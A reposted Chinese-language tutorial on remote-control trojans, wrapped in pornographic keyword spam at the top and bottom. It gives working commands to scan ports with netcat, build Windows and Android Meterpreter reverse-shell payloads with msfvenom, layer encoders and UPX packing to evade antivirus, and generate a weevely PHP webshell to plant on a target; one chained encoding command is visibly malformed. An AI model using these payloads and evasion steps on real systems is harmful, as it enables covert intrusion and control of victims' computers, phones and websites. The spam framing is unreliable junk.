天天操夜夜爱_天天插天天操天天干_黄色av地址_成人黄色在线观看_国内久久久久久_欧美国产日韩一区二区三区_国产精品久久久久久久久晋中

win10電腦遠程控制

發布時間: 2023-04-15 21:49 閱讀: 文章來源:轉載

1生成被控端2、啟動主控端3、

Netcat 瑞士軍刀

掃描端口

建立連接

掃描某IP地址的指定端口

nc -v ip port

連接指定IP地址的指定端口的命令如下

nc ip port

以靶機Metasploitable 2的80端口為例測試

控制軟件如果是正向的,受害者計算機執行遠程控制被控端之后,會在自己主機上打開一個端口,等待hacker連接,受害者計算機不會主動通知計算機,因此hacker必須知道計算機A的IP地址

控制軟件如果是反向的,受害者計算機執行遠程控制被控端之后,會主動通知hacker,因此黑客無須知道受害者計算機的IP地址,目前主要使用的方式

1、如何使用MSFPC生成被控端 linux

各種類型的被控端

生成linux的被控端,IP選擇本機的etho網卡

運行run,很快就建好了一個handler,這就是對應被控終端的主控端

2、如何在kali linux2 中生成被控端

msfpc 是MSFvenom的優化版

┌──(rootkali)-[~]

└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 354 bytes

Final size of exe file: 73802 bytes

Saved as: /var/payload.exe

這里我們使用msfvenom命令生成一個被控端,使用的被控端就是一個用于windows操作系統的反向遠程控制軟件,即windows/meterpreter/reverse_tcp lhost=192.168.8.128是所使用的的kalilinux的虛擬機IP地址

使用以下命令可以查看所有可以使用的攻擊載荷

name攻擊載荷的名稱 操作系統+控制方式+模塊

查找Metasploit 可以在Android操作系統下運行的meterpreter

查看攻擊載荷需要設置的參數

msfvenom --list-options -p windows/meterpreter/reverse_tcp

2、如何在kali linux2中啟動主控端

輸入msfconsole啟動metasploit

在metasploit中使用handler作為主控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /root/payload.exe

3、遠程控制被控端與殺毒軟件的博弈

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -f exe -o /var/payload.exe

消除payload.exe的特征碼,msf編碼器可以將原可執行程傳重新編碼,生成一個新的二進制文件,這個文件執行后,msf編碼器會將原可執行程序解碼到內存中并執行

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/nonalpha -f c

-e 選擇的編碼器,使用 x86/nonalpha編寫方式的到的shellcode如圖所示

x86/shikata_ga_nai 兩次生成的shellcode雖然功能相同,但是代碼已經不同了,這也是黑客鐘愛的編碼方式,可以進行多次編碼 -i 編碼次數

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.128 lport=5000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f -raw | msfvenom -e x86/alpha_upper -a x86/countdown -a x86 --platform windows -i 10 -f exe -o /var/payload.exe

3.1 加殼也是對抗基于文件掃描和內存掃描的反病毒技術

加殼工具UPX

upx /var/payload.exe

3.2 powersploit免殺

4、Meterpreter在Android中的應用

4.1查找在Android運行的攻擊載荷

下面以 android/meterpreter/reverse_tcp 為例

msfvenom --list-options -p android/meterpreter/reverse_tcp

執行完畢后可以看到被控端的參數

測試環境

1、Android手機IP地址 192.168.1.101

2、kalilinux 安裝到虛擬機改用橋接模式 192.168.1.34

3、無線路由192.168.1.1

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=9999 R>/var/pentest.apk

這條命令執行完畢后就在var目錄生成了一個pentest.apk的文件

4、建立主控端

啟動Metasploit

msfconsole

5、對web實現遠程控制

中國菜刀 中國蟻劍 冰蝎 weevely(生成PHP木馬)

weevely generate 123456 /home/kali/Downloads/testweb.php

password 是生成木馬的密碼 path是路徑 filename 文件名

把后門傳到靶機里

???展開全文
相關文章
主站蜘蛛池模板: 久久这| 欧美经典剧情系列h版在线观看 | 亚洲日本va午夜中文字幕 | 欧美一区二区三区影院 | 黄色免费a级片 | 免费看又黄又爽又猛的网站 | 午夜亚洲视频 | 免费wwwxxx| 国产亚洲精品日韩综合网 | 天天做天天爽爽快快 | 国产黄色片在线免费观看 | 日日操夜夜操免费视频 | 99re在线这里只有精品免费 | 久久99精品久久久久久国产越南 | 欧美精品一区二区三区免费观看 | 国产亚洲欧美在线观看的 | 六月婷婷激情综合 | 99久久婷婷国产综合精品hsex | 亚洲一区二区三区高清 | 日本视频网址 | 九色九色九色在线综合888 | 狂野欧美激情性xxxx | 中文字幕日本不卡 | 日本www色视频成人免费免费 | 久久伊人操 | 人人看97| 精品久久香蕉国产线看观看亚洲 | 亚洲精品成人av在线 | 91久久人澡人人添人人爽 | 国产精品五月天 | 天天曰曰 | 亚洲九九夜夜 | 欧美在线中文字幕 | 酒店自拍chinasexvideos | 国产一二三视频 | 精品国产欧美一区二区五十路 | 麻豆免费观看视频 | 免费日本黄色网址 | 久久一区二区三区免费播放 | 欧美人成一本免费观看视频 | 久久99精品久久久久久久不卡 |